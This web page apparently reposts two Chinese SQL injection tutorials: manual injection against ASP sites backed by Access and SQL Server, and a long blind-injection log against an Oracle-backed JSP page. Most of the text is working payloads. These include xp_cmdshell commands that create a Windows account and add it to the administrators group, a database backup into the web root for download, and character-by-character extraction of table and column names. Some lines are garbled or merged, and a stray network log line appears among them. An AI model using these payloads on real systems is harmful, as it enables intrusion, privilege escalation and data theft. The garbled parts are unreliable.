当前位置：首页 > 范文大全 > 实用文>纯手工注射ASP脚本学习

纯手工注射ASP脚本学习

2023-05-09 08:51:05 收藏本文下载本文

“huigok”通过精心收集，向本站投稿了8篇纯手工注射ASP脚本学习，以下是小编为大家整理后的纯手工注射ASP脚本学习，希望能够帮助到大家。

纯手工注射ASP脚本学习

篇1：纯手工注射ASP脚本学习

手工注射ASP脚本技术：

ACCESS

查询数据库类型

www.zengke.com/product.asp?sort_id=24 and exists (select * from sysobjects)

查询表admin页面返回正常显示为有，错误为无，

www.zengke.com//product.asp?sort_id=24 and exists (select * from admin)

查询admin表中的项admin

/product.asp?sort_id=24 and exists (select admin_name from admin)

查询admin表中的项admin里面的内容长度小于出错等于返回正常

www.zengke.com//product.asp?sort_id=24 And (Select Top 1 len(cstr([pwd])) From (Select Top 1 * From [admin] Where 1=1 order by [pwd]) T order by [pwd] desc)<=7

暴力猜解admin表中的项admin_name

SQL

①Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”--

分号;在SQLServer中表示隔开前后两句语句，--表示后面的语句为注释，所以，这句语句在SQLServer中将被分成两句执行，先是Select出ID=1的记录，然后执行存储过程xp_cmdshell，这个存储过程用于调用系统命令，于是，用net命令新建了用户名为name、密码为password的windows的帐号，接着：

②Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup administrators name /add”--

将新建的帐号name加入管理员组，不用两分钟，你已经拿到了系统最高权限！当然，这种方法只适用于用sa连接数据库的情况，否则，是没有权限调用xp_cmdshell的，

③Site/url.asp?id=1 ;;and db_name>0

前面有个类似的例子and user>0，作用是获取连接用户名，db_name()是另一个系统变量，返回的是连接的数据库名。

④Site/url.asp?id=1;backup database 数据库名 to disk=’c:inetpubwwwroot.db’;--

这是相当狠的一招，从③拿到的数据库名，加上某些IIS出错暴露出的绝对路径，将数据库备份到Web目录下面，再用HTTP把整个数据库就完完整整的下载回来，所有的管理员及用户密码都一览无遗！在不知道绝对路径的时候，还可以备份到网络地址的方法（如\202.96.xx.xxShare.db），但成功率不高。

⑤Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0

前面说过，sysobjects是SQLServer的系统表，存储着所有的表名、视图、约束及其它对象，xtype=’U’ and status>0，表示用户建立的表名，上面的语句将第一个表名取出，与0比较大小，让报错信息把表名暴露出来。第二、第三个表名怎么获取？还是留给我们聪明的读者思考吧。

⑥Site/url.asp?id=1 ;;and (Select Top 1 col_name(object_id(‘表名’),1) from sysobjects)>0

从⑤拿到表名后，用object_id(‘表名’)获取表名对应的内部ID，col_name(表名ID,1)代表该表的第1个字段名，将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。

篇2：手工注射JSP学习脚本安全

1、判断注入类型（数字型还是字符型）

字符型和数字型数据判断：（希望有人能进一步的细化，细分为数字型和字符型判断两部分）

www.test.net/index_kaoyan_view.jsp?id=117 And user>char(0)

www.test.net/index_kaoyan_view.jsp?id=117 And userwww.test.net/index_kaoyan_view.jsp?id=117 And user>char(0) And 1=1

www.test.net/index_kaoyan_view.jsp?id=117 And userchar(0) And %25=

www.test.net/index_kaoyan_view.jsp?id=117 And userchar(0) And ( )=(

www.test.net/index_kaoyan_view.jsp?id=117) And userwww.test.net/index_kaoyan_view.jsp?id=117 And str(98)>str(97)

www.test.net/index_kaoyan_view.jsp?id=117 And str(98)

www.test.net/index_kaoyan_view.jsp?id=117 And str(98)>str(97) And 1=1

www.test.net/index_kaoyan_view.jsp?id=117 And str(98)str(97) And %25=

www.test.net/index_kaoyan_view.jsp?id=117 And userwww.test.net/index_kaoyan_view.jsp?id=117 And str(98)str(97) And ( )=(

www.test.net/index_kaoyan_view.jsp?id=117) And str(98)

出现正常的页面：

www.test.net/index_kaoyan_view.jsp?id=117 And USER>CHR(0)

www.test.net/index_kaoyan_view.jsp?id=117 And USER

2、猜解表数量和表名

数据库数量为3：

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And UNISTR(1)>UNISTR(0)

以下为猜解数据表数量

数据表第一位为：1

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

数据表第二位为：3

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

数据表第三位为：1

www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 54=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 54>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

共有131个数据表，见上图，

以下为猜解表名称：

以下为判断第一个表的长度为：2

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

以下为判断第一个表的第一位值为：A

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1))

以下为判断第一个表AD的第二位值为：D

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

以下为判断第二个表的表ADER的表名长度为：4

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

以下为判断第二个表ADER第一位的值为：A

以下为判断第二个表ADER第二位的值为：D

以下为判断第二个表ADER第三位的值为：E

www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

以下为判断第二个表ADER第四位的值为：R

www.test.net/index_kaoyan_view.jsp?id=117 And 80=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

以下为判断第三个表的表名长度为：

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

3、猜解列名长度和列名：

a) 以下为猜解字段长度为：2位

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

 列名长度为：10位以上

以下猜解列名的长度的第一位为：1（十位）

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

以下猜解列名长度的第二位为：0（个位）

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

Informational 10/12/ 15:03:25 Suspect event: ICMP Time Exceeded (>1 for 1 seconds)

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 51>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 50=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 50>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 48=ascii(substr((SELECT COUNT(*) FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

 以下为猜解第一列的第一个字段名CLASS的长度为：5

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 5<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 9>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 7>nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

